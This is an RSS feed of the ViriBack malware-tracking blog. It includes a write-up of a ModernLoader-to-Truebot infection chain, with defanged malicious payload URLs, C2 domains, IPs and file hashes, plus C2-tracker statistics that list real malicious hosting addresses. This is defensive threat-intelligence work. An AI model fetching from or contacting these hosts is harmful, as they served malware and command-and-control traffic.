<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ViriBack Blog</title>
	<atom:link href="https://viriback.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://viriback.com</link>
	<description>Malware Tracker, IOCs &#38; more ...</description>
	<lastBuildDate>Sun, 09 Apr 2023 12:25:05 +0000</lastBuildDate>
	<language>en-CA</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://viriback.com/wp-content/uploads/2019/01/cropped-android-chrome-512x512-32x32.png</url>
	<title>ViriBack Blog</title>
	<link>https://viriback.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>ModernLoader to Truebot via PNG</title>
		<link>https://viriback.com/modernloader-to-truebot-via-png/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Sat, 08 Apr 2023 00:57:48 +0000</pubDate>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[modernloader]]></category>
		<category><![CDATA[truebot]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=282</guid>

					<description><![CDATA[While perusing on VT I found a new C2 domain for TrueBot. I have compiled a list of IOC's denoting the infection chain and some notes related to it. It starts with some JavaScript files. 4 of them have been identified and pointing to same TrueBot C2 ultimately. At time of writing this, they all  [...]]]></description>
										<content:encoded><![CDATA[<p>While perusing on VT I found a new C2 domain for TrueBot.</p>
<p>I have compiled a list of IOC&#8217;s denoting the infection chain and some notes related to it.</p>
<p>It starts with some JavaScript files. 4 of them have been identified and pointing to same TrueBot C2 ultimately.</p>
<p><img decoding="async" class="size-full wp-image-283 alignleft" src="https://viriback.com/wp-content/uploads/2023/04/0-vt.png" alt="" width="187" height="191" srcset="https://viriback.com/wp-content/uploads/2023/04/0-vt-66x66.png 66w, https://viriback.com/wp-content/uploads/2023/04/0-vt.png 187w" sizes="(max-width: 187px) 100vw, 187px" />At time of writing this, they all had low detection on VT, with 2 out of 59 engines falling them as malicious.</p>
<p>MD5<br />
71e7a2549311647a6178b84393700bf8<br />
4c75c5f63418b48ede30c16b079f324a<br />
3c57867dc4bdeb8a7d55dfb7d8ef5008<br />
287b172c23da5426cf039ef55d959fbd</p>
<p>&nbsp;</p>
<p>As per comment from @thor_scanner on VT. These files are from an unknown Javascript obfuscator and first noticed in February 23 by the @malwrhunterteam on Twitter.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-284" src="https://viriback.com/wp-content/uploads/2023/04/2-thor.png" alt="" width="674" height="249" srcset="https://viriback.com/wp-content/uploads/2023/04/2-thor-200x74.png 200w, https://viriback.com/wp-content/uploads/2023/04/2-thor-300x111.png 300w, https://viriback.com/wp-content/uploads/2023/04/2-thor-400x148.png 400w, https://viriback.com/wp-content/uploads/2023/04/2-thor-600x222.png 600w, https://viriback.com/wp-content/uploads/2023/04/2-thor.png 674w" sizes="(max-width: 674px) 100vw, 674px" /></p>
<p>See the comment <a href="https://www.virustotal.com/gui/file/f523d4bfcd07dd6d32441fcdb9342b35fb018606a9b0f1304f451dc67a7a3ccf/community">here</a></p>
<p><img decoding="async" class="aligncenter size-full wp-image-285" src="https://viriback.com/wp-content/uploads/2023/04/1-feb23.png" alt="" width="616" height="387" srcset="https://viriback.com/wp-content/uploads/2023/04/1-feb23-200x126.png 200w, https://viriback.com/wp-content/uploads/2023/04/1-feb23-300x188.png 300w, https://viriback.com/wp-content/uploads/2023/04/1-feb23-320x202.png 320w, https://viriback.com/wp-content/uploads/2023/04/1-feb23-400x251.png 400w, https://viriback.com/wp-content/uploads/2023/04/1-feb23-600x377.png 600w, https://viriback.com/wp-content/uploads/2023/04/1-feb23.png 616w" sizes="(max-width: 616px) 100vw, 616px" /></p>
<p>&nbsp;</p>
<p>See: <a href="https://twitter.com/malwrhunterteam/status/1627751337252249600">Tweet Here</a></p>
<p>These files are heavily obfuscated Javascript file, that I didnt waste time on trying to deobfuscate. I trusted the sandbox execution on VT to further correlate.</p>
<p><img decoding="async" class="aligncenter size-full wp-image-287" src="https://viriback.com/wp-content/uploads/2023/04/4-js-1.png" alt="" width="636" height="479" srcset="https://viriback.com/wp-content/uploads/2023/04/4-js-1-200x151.png 200w, https://viriback.com/wp-content/uploads/2023/04/4-js-1-300x226.png 300w, https://viriback.com/wp-content/uploads/2023/04/4-js-1-400x301.png 400w, https://viriback.com/wp-content/uploads/2023/04/4-js-1-600x452.png 600w, https://viriback.com/wp-content/uploads/2023/04/4-js-1.png 636w" sizes="(max-width: 636px) 100vw, 636px" /></p>
<p>They all called out to a url on the following IP: 62[.]204[.]41[.]69. The Url in question is : hxxp://62[.]204[.]41[.]69/dll[.]png</p>
<p><img decoding="async" class="aligncenter size-full wp-image-289" src="https://viriback.com/wp-content/uploads/2023/04/3-wire-1.png" alt="" width="625" height="319" srcset="https://viriback.com/wp-content/uploads/2023/04/3-wire-1-200x102.png 200w, https://viriback.com/wp-content/uploads/2023/04/3-wire-1-300x153.png 300w, https://viriback.com/wp-content/uploads/2023/04/3-wire-1-400x204.png 400w, https://viriback.com/wp-content/uploads/2023/04/3-wire-1-600x306.png 600w, https://viriback.com/wp-content/uploads/2023/04/3-wire-1.png 625w" sizes="(max-width: 625px) 100vw, 625px" /></p>
<p>&nbsp;</p>
<p><img decoding="async" class="aligncenter size-large wp-image-290" src="https://viriback.com/wp-content/uploads/2023/04/31-wire-1024x512.png" alt="" width="1024" height="512" srcset="https://viriback.com/wp-content/uploads/2023/04/31-wire-200x100.png 200w, https://viriback.com/wp-content/uploads/2023/04/31-wire-300x150.png 300w, https://viriback.com/wp-content/uploads/2023/04/31-wire-400x200.png 400w, https://viriback.com/wp-content/uploads/2023/04/31-wire-600x300.png 600w, https://viriback.com/wp-content/uploads/2023/04/31-wire-768x384.png 768w, https://viriback.com/wp-content/uploads/2023/04/31-wire-800x400.png 800w, https://viriback.com/wp-content/uploads/2023/04/31-wire-1024x512.png 1024w, https://viriback.com/wp-content/uploads/2023/04/31-wire.png 1031w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>&nbsp;</p>
<p>WGET on this url retrieves a file, that was not recognized as an image of PNG format. The MD5 of the file was: 8245ac0319d4b55dd29a13e20fc5db35</p>
<p>This script as show above in the HTTP response of the screenshot, gave us another interesting url : hxxp://62[.]204[.]41[.]69/ldn[.]dll</p>
<p>Which served a another payload in the form of a dll with MD5 hash: f52363b6cf282669e5fcc5537b5c3451</p>
<p>This one is Truebot. It is a signed code file and loaded the previously mentionned script.</p>
<p><img decoding="async" class="aligncenter size-full wp-image-302" src="https://viriback.com/wp-content/uploads/2023/04/6-signed.png" alt="" width="336" height="460" srcset="https://viriback.com/wp-content/uploads/2023/04/6-signed-200x274.png 200w, https://viriback.com/wp-content/uploads/2023/04/6-signed-219x300.png 219w, https://viriback.com/wp-content/uploads/2023/04/6-signed.png 336w" sizes="(max-width: 336px) 100vw, 336px" /></p>
<p>&nbsp;</p>
<p>That Truebot sample calls out to domain: droogggdhfhf[.]com which is hosted on the following IP: 92[.]118[.]36[.]236 but the server doesnt seem to respond at the moment.</p>
<p><img decoding="async" class="aligncenter size-full wp-image-292" src="https://viriback.com/wp-content/uploads/2023/04/7-resolve-1.png" alt="Truebot Resolves" width="719" height="466" srcset="https://viriback.com/wp-content/uploads/2023/04/7-resolve-1-200x130.png 200w, https://viriback.com/wp-content/uploads/2023/04/7-resolve-1-300x194.png 300w, https://viriback.com/wp-content/uploads/2023/04/7-resolve-1-400x259.png 400w, https://viriback.com/wp-content/uploads/2023/04/7-resolve-1-600x389.png 600w, https://viriback.com/wp-content/uploads/2023/04/7-resolve-1.png 719w" sizes="(max-width: 719px) 100vw, 719px" /></p>
<p>Further to this, the IP serving the payload: 62[.]204[.]41[.]69 is host to ModernLoader C2 Panel at hxxp://62[.]204[.]41[.]69/AVA/</p>
<p><img decoding="async" class="aligncenter size-full wp-image-295" src="https://viriback.com/wp-content/uploads/2023/04/avatar-2.png" alt="" width="808" height="436" srcset="https://viriback.com/wp-content/uploads/2023/04/avatar-2-200x108.png 200w, https://viriback.com/wp-content/uploads/2023/04/avatar-2-300x162.png 300w, https://viriback.com/wp-content/uploads/2023/04/avatar-2-400x216.png 400w, https://viriback.com/wp-content/uploads/2023/04/avatar-2-600x324.png 600w, https://viriback.com/wp-content/uploads/2023/04/avatar-2-768x414.png 768w, https://viriback.com/wp-content/uploads/2023/04/avatar-2-800x432.png 800w, https://viriback.com/wp-content/uploads/2023/04/avatar-2.png 808w" sizes="(max-width: 808px) 100vw, 808px" /></p>
<p>&nbsp;</p>
<p><strong>IOCs:</strong></p>
<p><strong>Javascript MD5 Hash:</strong></p>
<p>71e7a2549311647a6178b84393700bf8<br />
4c75c5f63418b48ede30c16b079f324a<br />
3c57867dc4bdeb8a7d55dfb7d8ef5008<br />
287b172c23da5426cf039ef55d959fbd</p>
<p><strong>Fake PNG MD5 Hash:</strong></p>
<p>8245ac0319d4b55dd29a13e20fc5db35</p>
<p><strong>Truebot DLL payload MD5 Hash:</strong></p>
<p>f52363b6cf282669e5fcc5537b5c3451</p>
<p><strong>ModernLoader IP:</strong></p>
<p>62[.]204[.]41[.]69.</p>
<p><strong>ModernLoader URL:</strong></p>
<p>hxxp://62[.]204[.]41[.]69/dll[.]png</p>
<p><strong>Truebot Callout C2 Domain:</strong></p>
<p>droogggdhfhf[.]com</p>
<p><strong>Truebot C2 IP:</strong></p>
<p>92[.]118[.]36[.]236</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>2022 C2 Tracker Recap in Graphics</title>
		<link>https://viriback.com/2022-c2-tracker-recap-in-graphics/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Mon, 02 Jan 2023 16:48:35 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[2022]]></category>
		<category><![CDATA[c2]]></category>
		<category><![CDATA[stats]]></category>
		<category><![CDATA[top10]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=261</guid>

					<description><![CDATA[First and foremost; Happy new year 2023 ! A new year celebration is not complete without a recap of the previous year. So here it is, graphics and compilation of what was seen by the C2 tracker in 2022. A total of 979 Live C2 panels were registered in the tracker from January to December  [...]]]></description>
										<content:encoded><![CDATA[<p>First and foremost; Happy new year 2023 !</p>
<p>A new year celebration is not complete without a recap of the previous year. So here it is, graphics and compilation of what was seen by the C2 tracker in 2022.</p>
<p>A total of 979 Live C2 panels were registered in the tracker from January to December 2022. The panels were spread across 56 malware families. Some big malware name left the trakcer while new families made it in.</p>
<h3>TOP10 of malware names</h3>
</p>
<div class="table-2">
<table width="100%">
<thead>
<tr>
<th align="left">Malware</th>
<th align="left">Volume</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Collector</td>
<td align="left">179</td>
</tr>
<tr>
<td align="left">AgentTesla</td>
<td align="left">145</td>
</tr>
<tr>
<td align="left">Oski</td>
<td align="left">97</td>
</tr>
<tr>
<td align="left">Amadey</td>
<td align="left">86</td>
</tr>
<tr>
<td align="left">Keitaro</td>
<td align="left">77</td>
</tr>
<tr>
<td align="left">Mars</td>
<td align="left">68</td>
</tr>
<tr>
<td align="left">Aurora</td>
<td align="left">58</td>
</tr>
<tr>
<td align="left">Lokibot</td>
<td align="left">54</td>
</tr>
<tr>
<td align="left">Azorult</td>
<td align="left">28</td>
</tr>
<tr>
<td align="left">Gomorrah</td>
<td align="left">21</td>
</tr>
</tbody>
</table>
</div>
<p>
<p><img decoding="async" class="aligncenter size-large wp-image-263" src="https://viriback.com/wp-content/uploads/2023/01/top10mal-1024x608.png" alt="" width="1024" height="608" srcset="https://viriback.com/wp-content/uploads/2023/01/top10mal-200x119.png 200w, https://viriback.com/wp-content/uploads/2023/01/top10mal-300x178.png 300w, https://viriback.com/wp-content/uploads/2023/01/top10mal-400x238.png 400w, https://viriback.com/wp-content/uploads/2023/01/top10mal-600x356.png 600w, https://viriback.com/wp-content/uploads/2023/01/top10mal-768x456.png 768w, https://viriback.com/wp-content/uploads/2023/01/top10mal-800x475.png 800w, https://viriback.com/wp-content/uploads/2023/01/top10mal-1024x608.png 1024w, https://viriback.com/wp-content/uploads/2023/01/top10mal.png 1143w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>&nbsp;</p>
<h3>TOP10 Hosting Country</h3>
</p>
<div class="table-2">
<table width="100%">
<thead>
<tr>
<th align="left">Country</th>
<th align="left">Volume</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Russia</td>
<td align="left">386</td>
</tr>
<tr>
<td align="left">United States</td>
<td align="left">230</td>
</tr>
<tr>
<td align="left">NetherLand</td>
<td align="left">68</td>
</tr>
<tr>
<td align="left">Germany</td>
<td align="left">50</td>
</tr>
<tr>
<td align="left">Vietnam</td>
<td align="left">41</td>
</tr>
<tr>
<td align="left">Luxembourg</td>
<td align="left">19</td>
</tr>
<tr>
<td align="left">Bulgaria</td>
<td align="left">16</td>
</tr>
<tr>
<td align="left">Sechelles</td>
<td align="left">14</td>
</tr>
<tr>
<td align="left">United Kingdom</td>
<td align="left">13</td>
</tr>
<tr>
<td align="left">KAzakhstan</td>
<td align="left">12</td>
</tr>
</tbody>
</table>
</div>
<p>
<p><img decoding="async" class="aligncenter size-large wp-image-265" src="https://viriback.com/wp-content/uploads/2023/01/worldmap-1024x503.png" alt="" width="1024" height="503" srcset="https://viriback.com/wp-content/uploads/2023/01/worldmap-200x98.png 200w, https://viriback.com/wp-content/uploads/2023/01/worldmap-300x147.png 300w, https://viriback.com/wp-content/uploads/2023/01/worldmap-400x197.png 400w, https://viriback.com/wp-content/uploads/2023/01/worldmap-600x295.png 600w, https://viriback.com/wp-content/uploads/2023/01/worldmap-768x377.png 768w, https://viriback.com/wp-content/uploads/2023/01/worldmap-800x393.png 800w, https://viriback.com/wp-content/uploads/2023/01/worldmap-1024x503.png 1024w, https://viriback.com/wp-content/uploads/2023/01/worldmap-1200x590.png 1200w, https://viriback.com/wp-content/uploads/2023/01/worldmap.png 1227w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>&nbsp;</p>
<h3>Top10 Hosting IP addresses</h3>
</p>
<div class="table-2">
<table width="100%">
<thead>
<tr>
<th align="left">IP address</th>
<th align="left">Volume</th>
<th align="left">AS Name</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">185.179.188.139</td>
<td align="left">77</td>
<td align="left">WEBHOST1-AS</td>
</tr>
<tr>
<td align="left">141.8.197.42</td>
<td align="left">59</td>
<td align="left">SPRINTHOST</td>
</tr>
<tr>
<td align="left">103.151.122.110</td>
<td align="left">40</td>
<td align="left">VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP</td>
</tr>
<tr>
<td align="left">141.8.192.151</td>
<td align="left">26</td>
<td align="left">SPRINTHOST</td>
</tr>
<tr>
<td align="left">141.8.193.236</td>
<td align="left">18</td>
<td align="left">SPRINTHOST</td>
</tr>
<tr>
<td align="left">198.251.89.144</td>
<td align="left">13</td>
<td align="left">PONYNET</td>
</tr>
<tr>
<td align="left">142.4.0.135</td>
<td align="left">10</td>
<td align="left">UNIFIEDLAYER-AS-1</td>
</tr>
<tr>
<td align="left">144.76.115.36</td>
<td align="left">8</td>
<td align="left">HETZNER-AS</td>
</tr>
<tr>
<td align="left">141.8.192.169</td>
<td align="left">7</td>
<td align="left">SPRINTHOST</td>
</tr>
<tr>
<td align="left">141.8.192.58</td>
<td align="left">6</td>
<td align="left">SPRINTHOST</td>
</tr>
</tbody>
</table>
</div>
<p>
<p><img decoding="async" class="aligncenter size-large wp-image-267" src="https://viriback.com/wp-content/uploads/2023/01/top10ip-1024x621.png" alt="" width="1024" height="621" srcset="https://viriback.com/wp-content/uploads/2023/01/top10ip-200x121.png 200w, https://viriback.com/wp-content/uploads/2023/01/top10ip-300x182.png 300w, https://viriback.com/wp-content/uploads/2023/01/top10ip-400x243.png 400w, https://viriback.com/wp-content/uploads/2023/01/top10ip-600x364.png 600w, https://viriback.com/wp-content/uploads/2023/01/top10ip-768x466.png 768w, https://viriback.com/wp-content/uploads/2023/01/top10ip-800x485.png 800w, https://viriback.com/wp-content/uploads/2023/01/top10ip-1024x621.png 1024w, https://viriback.com/wp-content/uploads/2023/01/top10ip.png 1190w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>&nbsp;</p>
<h3>TOP10 Hostnames</h3>
</p>
<div class="table-2">
<table width="100%">
<thead>
<tr>
<th align="left">Hostname</th>
<th align="left">Volume</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">103.151.122.110</td>
<td align="left">40</td>
</tr>
<tr>
<td align="left">sempersim.su</td>
<td align="left">16</td>
</tr>
<tr>
<td align="left">agusanplantation.com</td>
<td align="left">13</td>
</tr>
<tr>
<td align="left">136.144.41.76</td>
<td align="left">6</td>
</tr>
<tr>
<td align="left">renox.lol</td>
<td align="left">6</td>
</tr>
<tr>
<td align="left">208.67.105.161</td>
<td align="left">6</td>
</tr>
<tr>
<td align="left">171.22.30.164</td>
<td align="left">6</td>
</tr>
<tr>
<td align="left">update1.com</td>
<td align="left">5</td>
</tr>
<tr>
<td align="left">107.189.4.253</td>
<td align="left">5</td>
</tr>
<tr>
<td align="left">cq65758.tmweb.ru</td>
<td align="left">4</td>
</tr>
</tbody>
</table>
</div>
<p>
<p><img decoding="async" class="aligncenter size-large wp-image-271" src="https://viriback.com/wp-content/uploads/2023/01/top10host-1024x543.png" alt="" width="1024" height="543" srcset="https://viriback.com/wp-content/uploads/2023/01/top10host-200x106.png 200w, https://viriback.com/wp-content/uploads/2023/01/top10host-300x159.png 300w, https://viriback.com/wp-content/uploads/2023/01/top10host-400x212.png 400w, https://viriback.com/wp-content/uploads/2023/01/top10host-600x318.png 600w, https://viriback.com/wp-content/uploads/2023/01/top10host-768x407.png 768w, https://viriback.com/wp-content/uploads/2023/01/top10host-800x424.png 800w, https://viriback.com/wp-content/uploads/2023/01/top10host-1024x543.png 1024w, https://viriback.com/wp-content/uploads/2023/01/top10host-1200x636.png 1200w, https://viriback.com/wp-content/uploads/2023/01/top10host.png 1317w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>C2 Tracker &#8211; Stats &#038; Pivot</title>
		<link>https://viriback.com/c2-tracker-stats-pivot/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Thu, 29 Dec 2022 20:22:58 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[abuse.ch]]></category>
		<category><![CDATA[c2]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[tracker]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=231</guid>

					<description><![CDATA[Its been a while since I updated this website/blog. Today, I got some time to makes some changes on the tracker side of the website. I added some new elements on the stats page, some new download options, and a clickable malware name that renders pivoting easier for a given malware family. First Off, the  [...]]]></description>
										<content:encoded><![CDATA[<p>Its been a while since I updated this website/blog.</p>
<p>Today, I got some time to makes some changes on the tracker side of the website. I added some new elements on the stats page, some new download options, and a clickable malware name that renders pivoting easier for a given malware family.</p>
<p>First Off, the stats page now shows 2 new elements:</p>
<p>Last 30 days Top 10 malware family for panels seen in the tracker.</p>
<p>It also displays last 30 days in the form of an histogram, for numbers of panel added daily.</p>
<h3>Malware Name now clickable</h3>
<p><img decoding="async" class="alignright size-full wp-image-233" src="https://viriback.com/wp-content/uploads/2022/12/malware.png" alt="Clickable malware name" width="263" height="326" srcset="https://viriback.com/wp-content/uploads/2022/12/malware-242x300.png 242w, https://viriback.com/wp-content/uploads/2022/12/malware.png 263w" sizes="(max-width: 263px) 100vw, 263px" /></p>
<p>The malware name on the page of the tracker is now clickable. This will generate a url for a specific family, with all entries for said family.</p>
<h3>2 new download options</h3>
<p>As the data count grows, I received some request to have a more digestable download options.</p>
<p>I added 2 new options:</p>
<ul>
<li>Download last 30 days of panels in CSV</li>
<li>Download last 50 panels in CSV</li>
</ul>
<p>The bulk dump download option still exists.</p>
<h3>New design for the blog</h3>
<p>As you may have noticed, I redesigned the blog template to a basic design in same color tone.</p>
<h3>
Now in ThreatFox by Abuse.ch</h3>
<p>Abuse.ch who does a wonderful job of providing multiple platforms to fight cybercrime and allow easy sharing of IOC, as now started to ingest Viriback Tracker data:</p>
<p>&nbsp;</p>
<p><img decoding="async" class="aligncenter size-full wp-image-258" src="https://viriback.com/wp-content/uploads/2022/12/tfox.png" alt="" width="612" height="379" srcset="https://viriback.com/wp-content/uploads/2022/12/tfox-200x124.png 200w, https://viriback.com/wp-content/uploads/2022/12/tfox-300x186.png 300w, https://viriback.com/wp-content/uploads/2022/12/tfox-400x248.png 400w, https://viriback.com/wp-content/uploads/2022/12/tfox-600x372.png 600w, https://viriback.com/wp-content/uploads/2022/12/tfox.png 612w" sizes="(max-width: 612px) 100vw, 612px" /></p>
<p>&nbsp;</p>
<p>See: https://threatfox.abuse.ch/browse/tag/ViriBack/</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>C2 Tracker : ++ScreenShots</title>
		<link>https://viriback.com/c2-tracker-screenshots/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Mon, 09 Dec 2019 02:17:14 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[c2]]></category>
		<category><![CDATA[login]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[tracker]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=176</guid>

					<description><![CDATA[  I added a new feature to the Malware C2 Tracker. Hovering with the mouse cursor over a specific C2 panel login page will provide a screenshot of the page when added to the crawler. This feature is powered by URLScan.io Whenever I add a new panel url to the tracker , it will also  [...]]]></description>
										<content:encoded><![CDATA[


<p>I added a new feature to the Malware C2 Tracker.</p>



<p>Hovering with the mouse cursor over a specific C2 panel login page will provide a screenshot of the page when added to the crawler. This feature is powered by <a href="https://urlscan.io/">URLScan.io</a></p>



<p>Whenever I add a new panel url to the tracker , it will also be added to URLScan for crawling. Furthermore, clicking on the panel url will open a new window to the URLScan report.<br /><br />Proper tags will be added to the submission on URLScan for better clustering.<br /><br />I hear good news and new features are coming to URLScan that will leverage tags and similarity between submissions.<br /><br />Here is an example provided by the tracker: <a href="https://urlscan.io/result/a0f1024f-8a47-47df-9d7b-10b3503f9ef5/">PredatorTheThief</a></p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="566" class="wp-image-179" src="https://viriback.com/wp-content/uploads/2019/12/urlscan-1024x566.png" alt="Predator The Thief malware submission" srcset="https://viriback.com/wp-content/uploads/2019/12/urlscan-300x166.png 300w, https://viriback.com/wp-content/uploads/2019/12/urlscan-768x425.png 768w, https://viriback.com/wp-content/uploads/2019/12/urlscan-1024x566.png 1024w, https://viriback.com/wp-content/uploads/2019/12/urlscan.png 1183w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>After 1000 malware C2 panels</title>
		<link>https://viriback.com/after-a-1000-malware-c2-panels/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Sat, 02 Nov 2019 13:54:04 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[c2]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[panels]]></category>
		<category><![CDATA[stats]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=163</guid>

					<description><![CDATA[Its been 5 months since I started recording the malware C2 panels I see during my online endeavours... Today I busted the 1000 panels, here are quick stats about these panels: So far the number distince malware families is : 43Here is a pie chart of the Top 10 families I have seen live and  [...]]]></description>
										<content:encoded><![CDATA[
<p>Its been 5 months since I started recording the malware C2 panels I see during my online endeavours&#8230; Today I busted the 1000 panels, here are quick stats about these panels:</p>



<figure class="wp-block-image"><img decoding="async" width="852" height="714" class="wp-image-164" src="https://viriback.com/wp-content/uploads/2019/11/stats.png" alt="" srcset="https://viriback.com/wp-content/uploads/2019/11/stats-300x251.png 300w, https://viriback.com/wp-content/uploads/2019/11/stats-768x644.png 768w, https://viriback.com/wp-content/uploads/2019/11/stats.png 852w" sizes="(max-width: 852px) 100vw, 852px" /></figure>



<p>So far the number distince malware families is : 43<br /><br />Here is a pie chart of the Top 10 families I have seen live and recorded:</p>



<figure class="wp-block-image"><img decoding="async" width="735" height="682" class="wp-image-165" src="https://viriback.com/wp-content/uploads/2019/11/top10pie.png" alt="" srcset="https://viriback.com/wp-content/uploads/2019/11/top10pie-300x278.png 300w, https://viriback.com/wp-content/uploads/2019/11/top10pie.png 735w" sizes="(max-width: 735px) 100vw, 735px" /></figure>



<p>The worlwide geographical distribution of the IP addresses is similar to the first month of recording, however, Russia is far more colored this time.</p>



<figure class="wp-block-image"><img decoding="async" width="1024" height="539" class="wp-image-166" src="https://viriback.com/wp-content/uploads/2019/11/world-1024x539.png" alt="" srcset="https://viriback.com/wp-content/uploads/2019/11/world-300x158.png 300w, https://viriback.com/wp-content/uploads/2019/11/world-768x404.png 768w, https://viriback.com/wp-content/uploads/2019/11/world-1024x539.png 1024w, https://viriback.com/wp-content/uploads/2019/11/world.png 1087w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>These are the top 15 ips seen :</p>



<figure class="wp-block-image"><img decoding="async" width="1024" height="629" class="wp-image-170" src="https://viriback.com/wp-content/uploads/2019/11/topips-1-1024x629.png" alt="" srcset="https://viriback.com/wp-content/uploads/2019/11/topips-1-300x184.png 300w, https://viriback.com/wp-content/uploads/2019/11/topips-1-768x472.png 768w, https://viriback.com/wp-content/uploads/2019/11/topips-1-1024x629.png 1024w, https://viriback.com/wp-content/uploads/2019/11/topips-1.png 1043w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Here is a Top 13 distribution according to respective ASN:</p>



<figure class="wp-block-image"><img decoding="async" width="1024" height="629" class="wp-image-172" src="https://viriback.com/wp-content/uploads/2019/11/topas-1024x629.png" alt="" srcset="https://viriback.com/wp-content/uploads/2019/11/topas-300x184.png 300w, https://viriback.com/wp-content/uploads/2019/11/topas-768x472.png 768w, https://viriback.com/wp-content/uploads/2019/11/topas-1024x629.png 1024w, https://viriback.com/wp-content/uploads/2019/11/topas.png 1151w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>C2 Tracker Stats for June 2019</title>
		<link>https://viriback.com/c2-tracker-stats-for-june-2019/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Mon, 01 Jul 2019 14:48:25 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[c2]]></category>
		<category><![CDATA[graphs]]></category>
		<category><![CDATA[june 2019]]></category>
		<category><![CDATA[stats]]></category>
		<category><![CDATA[tracker]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=132</guid>

					<description><![CDATA[You will find a summary in graphs of the stats of the C2 Tracker for June 2019. Total for the month of June 2019 PewPew Heat map Top 10 Families Top Ips Top Domains]]></description>
										<content:encoded><![CDATA[
<p>You will find a summary in graphs of the stats of the C2 Tracker for June 2019.</p>



<figure class="wp-block-image"><img decoding="async" width="804" height="725" src="https://viriback.com/wp-content/uploads/2019/07/total.png" alt="" class="wp-image-133" srcset="https://viriback.com/wp-content/uploads/2019/07/total-300x271.png 300w, https://viriback.com/wp-content/uploads/2019/07/total-768x693.png 768w, https://viriback.com/wp-content/uploads/2019/07/total.png 804w" sizes="(max-width: 804px) 100vw, 804px" /><figcaption>Total for the month of June 2019</figcaption></figure>



<figure class="wp-block-image"><img decoding="async" width="1024" height="506" src="https://viriback.com/wp-content/uploads/2019/07/map-1024x506.png" alt="" class="wp-image-134" srcset="https://viriback.com/wp-content/uploads/2019/07/map-300x148.png 300w, https://viriback.com/wp-content/uploads/2019/07/map-768x380.png 768w, https://viriback.com/wp-content/uploads/2019/07/map-1024x506.png 1024w, https://viriback.com/wp-content/uploads/2019/07/map.png 1125w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>PewPew Heat map</figcaption></figure>



<figure class="wp-block-image"><img decoding="async" width="767" height="517" src="https://viriback.com/wp-content/uploads/2019/07/piefam.png" alt="" class="wp-image-139" srcset="https://viriback.com/wp-content/uploads/2019/07/piefam-300x202.png 300w, https://viriback.com/wp-content/uploads/2019/07/piefam.png 767w" sizes="(max-width: 767px) 100vw, 767px" /><figcaption>Top 10 Families</figcaption></figure>



<figure class="wp-block-image"><img decoding="async" width="702" height="650" src="https://viriback.com/wp-content/uploads/2019/07/topips.png" alt="" class="wp-image-142" srcset="https://viriback.com/wp-content/uploads/2019/07/topips-300x278.png 300w, https://viriback.com/wp-content/uploads/2019/07/topips.png 702w" sizes="(max-width: 702px) 100vw, 702px" /><figcaption>Top Ips</figcaption></figure>



